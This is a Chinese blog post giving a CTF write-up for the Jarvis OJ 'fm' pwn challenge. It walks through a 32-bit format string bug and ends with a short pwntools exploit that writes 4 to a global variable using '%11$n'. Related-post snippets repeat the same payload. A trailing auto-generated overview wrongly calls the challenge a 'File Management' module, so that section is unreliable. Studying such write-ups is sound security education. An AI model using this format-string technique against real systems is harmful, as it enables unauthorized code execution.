(Jarvis Oj)(Pwn) fm

格式化字符串漏洞利用
最新推荐文章于 2025-02-25 21:39:52 发布
原创 最新推荐文章于 2025-02-25 21:39:52 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

(Jarvis Oj)(Pwn) fm

查看保护。
这里写图片描述
ida查看程序逻辑。
这里写图片描述
第12行,很明显的格式化字符串漏洞,当全局变量x的值是4的时候会执行system函数,查看x的值。
这里写图片描述
x的值是3。所以就要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第几个参数来确定[i]的值,由于x_addr在32位程序中刚好是4个字节,所以这个格式化字符串刚好能把相应参数变为4。通过gdb确定位置。
这里写图片描述
这里写图片描述
可以看到0x41414141就是的位置,数一下就可以得到是第11个参数,尝试一下。
这里写图片描述
这里写图片描述
确实是11个参数。于是可以把AAAA替换为x的地址,p换成n就可以把x写成4,写得脚本。

  1 from pwn import *
  2 
  3 #conn=process('./fm')
  4 conn=remote('pwn2.jarvisoj.com','9895')
  5 e=ELF('./fm')
  6 x_addr=0x0804A02C                                      
  7 payload=p32(x_addr)+"%11$n"
  8 conn.sendline(payload)
  9 conn.interactive()
【CTF】jarvisoj_fm 1
凉水的博客
07-06 676
jarvisoj_fm
jarvisoj_fm【BUUCTF】
qq_41696518的博客
08-31 431
jarvisoj_fm【BUUCTF】
Jarvis Oj Pwn 学习笔记-fm
baoan4763的博客
06-11 217
格式化串漏洞(32bit): 链接领走: https://files.cnblogs.com/files/Magpie/fm.rar nc pwn2.jarvisoj.com 9895 首先验身: 看到某种奇怪的鸟类不禁慌了一哈...... 好,现在丢IDA: 先是看到了这样一个妩媚妖艳的东西...她被调用在main函数: 跟进去: 没看懂....(或许...
JarvisOJ PWN fm wp
苗_的博客
01-24 416
fm 拿到之后首先ida一下,看一下主函数,找漏洞点: 然后就发现第10行是一个很简单的格式化字符串漏洞,看一下x的内存地址: x的值是3,所以要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第几个参数来确定[i]的值,由于x_addr在32位程序...
JarvisOJ fm
PLpa的博客
07-09 1240
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.youkuaiyun.com/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
Javisoj--PWN--fm
Jason_ZhouYetao的博客
12-09 1143
首先IDA看一波: 看到这里就可以很清楚的知道这个肯定是一个格式化字符串的题,因为这个涉及到了更改栈中的元素的值,第一眼看到这个X,你可能有点慌,因为你没有发现有关X的任何定义,不过没关系,没有任何定义就出现在IDA中的变量,他一定就是一个全局变量,在pseudocode界面直接双击x,发现界面发生了跳转: 这个可以直接看到x的地址:0x804A02C,这个在之后的格式化字符串中有着很...
[BUUCTF]PWN——jarvisoj_fm
mcmuyanga的博客
10-31 1588
jarvisoj_fm 附件 步骤: 例行检查,32位,开启了canary和nx保护 运行一下程序,看看大概的情况 32位ida载入,shift+f12检索程序里的字符串,看见了 " /bin/sh " 字符串 双击跟进,找到程序主体,当x=4的时候会执行system(/bin/sh) 第10行存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 x_addr=0x804A02C 来找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 利用x的地址配合上%11
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 318
BUUCTF 做题练习
jarvisoj_fm
2301_81060697的博客
02-25 536
关键函数:fmtstr_payload
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 375
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
Jarvis OJ
kof2019的博客
08-05 501
Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调试的过程 题目: 分析: 刚开始拿到这道题目还是想用IDA静态分析,但无奈函数太多找不到关键函数,看别人Writeup也只是说关键函数为sub_401BB0但不知道怎么找
jarvis OJ
CHOOOU的博客
11-05 1004
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
jarvis oj fm writeup
ditto的博客
01-05 393
格式化字符串漏洞简单利用 32位程序。 canary和nx都打开了。 放ida里: 直接打印的buf,很明显的格式化字符串漏洞。 用%n,将其修改为4即可,exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9895") payload=p32(0x0804A02C)+"%11$n" a.sendline(payload) a....
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 386
有canary ,题目提升fm,考虑格式化字符串。
jarvisoj_fm 1 格式化字符串漏洞
m0_49766582的博客
06-01 272
1 from pwn import * 2 p = remote("node3.buuoj.cn",29263) 3 payload = p32(0x0804A02C)+b"%11$n" 4 p.sendline(payload) 5 p.interactive() ~ 需要覆盖x的值,将x的值变为4,利用格式化字符串漏洞。
jarvisoj_fm1解题
2301_81504456的博客
07-10 305
BUUCTF解题
jarvis oj_用一种态度来构建Jarvis,生成式聊天机器人
weixin_26632369的博客
07-20 1305
jarvis ojCarsales.com, the company I work for, is holding a hackathon event. This is an annual event where everyone (tech or non tech) comes together to form a team and build anything — anything at al...
Jarvis OJ 【REVERSE】 Smali
qq_26779635的博客
12-01 1142
题目:都说学好Smali是学习Android逆向的基础,现在刚好有一个smali文件,大家一起分析一下吧~~ 链接:Crackme.smali.36e0f9d764bb17e86d3d0acd49786a18 之前接触过点smali,看下文件就是smali,本来想找smali转java工具,但看了下smali发现几个函数名能推出东西,如下 然后结合smali语法花点时间看了...
jarvisoj_fm 1
最新发布
03-26
### JarvisOJ FM 功能概述 JarvisOJ 是一个在线编程练习平台,旨在帮助用户提升其逆向工程技能。其中的 FM(File Management)模块主要用于文件管理操作,涉及二进制文件分析、调试以及反汇编等内容[^1]。 FM 的核心功能包括但不限于以下几个方面: - **文件上传与解析** 用户可以通过该模块上传目标文件并对其进行初步解析,提取基本信息以便后续处理。 - **动态调试支持** 提供了一个集成环境用于运行和调试程序,允许设置断点、查看寄存器状态及内存数据等操作。 - **静态反汇编展示** 对于上传的目标可执行文件,能够生成对应的汇编代码视图,便于理解程序逻辑结构。 以下是实现简单文件读取的一个 Python 示例代码片段: ```python def read_binary_file(file_path): try: with open(file_path, 'rb') as file: content = file.read() return content except Exception as e: print(f"Error reading the binary file: {e}") ``` 此代码展示了如何打开并读取一个二进制文件的内容到内存中,这是许多基于文件的操作的第一步,在 JarvisOJ FM 中可能被用来加载待分析样本。 ### 常见问题解答 当使用 JarvisOJ FM 进行学习时可能会遇到一些典型疑问如下: #### 文件无法成功上传? 这可能是由于服务器端配置限制或者客户端网络连接不稳定引起的问题。建议检查所选文件大小是否超出规定上限,并确认当前互联网状况良好再尝试重新提交作业。 #### 调试过程中崩溃怎么办? 如果在利用内置工具对项目进行单步跟踪期间发生异常终止现象,则需仔细核查输入参数合法性;另外也要留意是否存在未初始化变量引用等情况造成非法访问错误。 #### 如何更高效地阅读大量汇编码? 除了依赖自动化插件辅助外,培养扎实的基础理论知识同样重要。平时应多加实践各类算法转换过程中的机器指令表达形式,逐渐形成快速定位关键路径的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值